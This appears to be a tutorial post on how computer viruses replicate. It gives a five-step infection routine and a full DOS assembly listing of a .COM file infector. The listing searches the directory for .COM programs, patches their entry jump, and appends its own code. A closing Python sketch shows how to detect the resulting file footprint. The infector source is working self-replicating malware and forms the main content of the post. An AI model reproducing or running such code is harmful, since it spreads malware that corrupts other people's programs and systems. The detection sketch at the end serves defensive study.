The survival of a virus depends on its ability to reproduce. “How do I make a program reproduce?”, you might ask.
Simple: by getting it to copy itself to other files.

The functional logic of a virus is as follows:

  1. Search for a file to infect
  2. Open the file to see if it is infected
  3. If infected, search for another file
  4. Else, infect the file
  5. Return control to the host program.

An example of a simple virus written in assembly language:

Once activated, this virus searches for the first .COM file in the directory and infects it. Later, when the infected file is executed, it infects files in its own directory.

codigo segment ‘code’
org 100h
assume cs:codigo,ds:codigo,es:codigo
start proc far
COMIENZO:
push cs
push cs
pop ds
pop es
call falso_proc
falso_proc proc near
falso_proc endp
pop bp
sub bp, 107h
mov ah, 4eh
lea dx, bp+file_inf
mov cx, 0000h
int 21h
mov ah, 3dh
mov al, 00000010b
mov dx, 009eh
int 21h
push ax
pop bx
push bx
mov ah, 3fh
mov cx, 0003h
lea dx, bp+buffer
int 21h
INFECTAR:
mov ax, 4200h
mov cx, 0000h
mov dx, 0000h
int 21h
mov ah, 40h
mov cx, 1d
lea dx, bp+jump
int 21h
mov cx, 2
mov si, 009ah
lea di, bp+longitud
rep movsb
mov ah, 40h
mov cx, 2d
lea dx, bp+longitud
int 21h
mov ax, 4202h
mov cx, 0000h
mov dx, 0000h
int 21h
add word ptr [bp+longitud],3
pop bx
mov ah, 40h
mov cx, 190d
lea dx, bp+comienzo
int 21h
mov ah, 3eh
int 21h
NO_INFECTAR:
mov cx, 0003h
mov di, 0100h
lea si, bp+buffer
rep movsb
mov ax, 0100h
jmp ax
buffer db 7d dup(0)
longitud db 2 dup(0)
file_inf db ‘*.COM’,0
jump db ‘é’,0
start endp
codigo ends
end comienzo

This virus was written in low-level assembly language, so it is difficult to understand and to code. But it is very fast and is able to cause damage to a system in a very short interval of time.
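Seen from the defender's side, the listing leaves a fixed footprint in every file it touches: a 1-byte E9h jump at offset 0, a 2-byte copy of the pre-infection file size at offsets 1-2, and 190 bytes appended at the end. The detection sketch below is an added example, not part of the original post; the function names, the labels and the sample byte strings are constructed for illustration, and the second check generalizes beyond this one listing.

```python
import struct

JMP_NEAR = 0xE9     # near-JMP opcode; the listing's `jump db 'é'` is this byte in Latin-1
APPENDED_LEN = 190  # size of the listing's final write: mov cx, 190d

def classify_com(data: bytes, tail: int = APPENDED_LEN) -> str:
    """Return 'listing-layout', 'jump-into-tail' or 'no-match' for a .COM image."""
    if len(data) < tail + 3 or data[0] != JMP_NEAR:
        return "no-match"
    (field,) = struct.unpack_from("<H", data, 1)   # bytes 1-2, little-endian
    original_len = len(data) - tail
    # Exact footprint: the listing copies the pre-infection size
    # (DTA offset 9Ah) into bytes 1-2 of the file.
    if field == original_len:
        return "listing-layout"
    # Generic heuristic (goes beyond the listing): the entry jump
    # lands somewhere inside the trailing `tail` bytes.
    target = (3 + field) & 0xFFFF                  # file offset the JMP reaches
    if original_len <= target < len(data):
        return "jump-into-tail"
    return "no-match"

def constructed_samples() -> dict:
    """Constructed byte strings; the appended tail is zero filler, not code."""
    host = b"\xB4\x4C\xCD\x21" + b"\x90" * 96      # 100 bytes: mov ah,4Ch / int 21h / padding
    filler = b"\x00" * APPENDED_LEN
    jmp = bytes([JMP_NEAR])
    return {
        "plain host": host,
        "listing footprint": jmp + struct.pack("<H", len(host)) + host[3:] + filler,
        "jump into tail": jmp + struct.pack("<H", len(host) + 20) + host[3:] + filler,
        "legitimate early jump": jmp + struct.pack("<H", 0x10) + b"\x90" * 400,
    }

if __name__ == "__main__":
    for name, image in constructed_samples().items():
        print(f"{name:24} {classify_com(image)}")
```

The generic branch also matches any legitimate program whose entry jump happens to reach its last 190 bytes, so treat it as a triage signal rather than a verdict.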
